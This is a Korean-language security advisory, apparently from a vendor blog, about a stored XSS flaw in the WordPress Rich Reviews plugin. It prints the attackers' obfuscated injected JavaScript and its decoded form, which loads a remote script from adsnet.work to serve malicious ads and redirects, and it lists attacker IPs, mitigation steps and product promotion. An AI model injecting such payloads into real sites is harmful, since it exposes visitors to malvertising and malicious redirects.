Rich Reviews 플러그인에서 심각한 XSS 취약점이 발견되었습니다. 플러그인 Rich Reviews에는 16,000개 이상의 활성 다운로드가 있는 것으로 추정됩니다. 중요하긴 하지만 플러그인이 2년 이상 업데이트되지 않았기 때문에 취약점이 발견된 것은 놀라운 일이 아닙니다.
실제로 Rich Reviews는 6개월 전 2019년 3월 11일에 WordPress 플러그인 디렉토리에서 제거되었습니다. 또한 영향을 받는 버전은 1.7.4 이하입니다. . 놀랍게도 지금까지 패치 출시 소식이 없습니다.
리치 리뷰 취약점 세부정보
취약점은 저장된 XSS로 식별되었습니다. 이로 인해 인증되지 않은 사용자는 플러그인이 설치된 WordPress 사이트에서 플러그인 옵션 업데이트를 악용할 수 있습니다.
현재로서는 악성 광고 형태의 악용이 밝혀졌습니다. 해커는 이 취약점을 사용하여 웹사이트에 악성 코드를 삽입하고 팝업 또는 악성 광고를 유발합니다. 이러한 광고와 팝업은 더 나아가 불쾌하고 음란한 사이트로 리디렉션됩니다.
기술적 세부사항
공격의 주요 원인은 플러그인의 액세스 제어 부족입니다. 게다가 위생 규칙도 부적절합니다.
리디렉션 광고 및 팝업을 유발하는 악성 코드는 다음과 같습니다. 해커가 탐지를 건너뛰기 위해 코드를 지능적으로 난독화한 것을 알 수 있습니다.
eval(String.fromCharCode(118, 97, 114, 32, 115, 99, 114, 105, 112, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 10, 115, 99, 114, 105, 112, 116, 46, 111, 110, 108, 111, 97, 100, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 125, 59, 10, 115, 99, 114, 105, 112, 116, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 97, 100, 115, 110, 101, 116, 46, 119, 111, 114, 107, 47, 115, 99, 114, 105, 112, 116, 115, 47, 112, 108, 97, 99, 101, 46, 106, 115, 34, 59, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 99, 114, 105, 112, 116, 41, 59));
위의 코드는 난독 해제 시 다음과 같이 변환됩니다.
var script = document.createElement('script');
script.onload = function() {
};
script.src = "https://adsnet.work/scripts/place.js";
document.getElementsByTagName('head')[0].appendChild(script);
해커 식별
다음 IP 주소에는 대부분의 공격과 연결된 링크가 있습니다.
- 94.229.170.38
- 183.90.250.26
- 69.27.116.3
또한 도메인 이름도 식별되었습니다. adsnet.work에 의해 진행됩니다. . 이러한 IP의 로그인 시도에 주의하십시오. 미리 웹사이트에 도달하지 못하도록 차단하는 것이 더 나은 솔루션이 될 것입니다.
감염 제거
공격의 불행한 희생자가 된 경우 당황하지 마십시오. Astra 보안 전문가에게 연락하면 편안하게 숨을 쉴 수 있도록 모든 것을 해결해 드립니다.
위험 완화 기법
아직 감염되지 않은 사람들은 시간이 있을 때 예방 조치를 취해야 합니다. 다음은 감염이 귀하에게 도달하는 것을 방지하기 위해 할 수 있는 몇 가지 조치입니다.
플러그인 제거
플러그인이 WP 디렉토리에서 취소되었으므로 개발자가 업데이트된 버전을 배포할 수 있는 방법이 없습니다. 안전을 위해 플러그인을 한 번에 제거하는 것이 좋습니다. 또한 개발자는 곧 패치를 출시할 의사가 없습니다.
방화벽으로 보호
플러그인을 제거한 후 방화벽을 사용하여 유사한 공격으로부터 보호하십시오. Astra 방화벽은 WordPress의 효율적인 옵션입니다. XSS, CSRF, SQLi, 불량 봇, LFI, RFI, OWASP 상위 10개 및 100개 이상의 기타 사이버 공격이 웹사이트에 영향을 미치는 것을 차단합니다.
내 웹사이트를 보호할 수 있도록 도와주세요.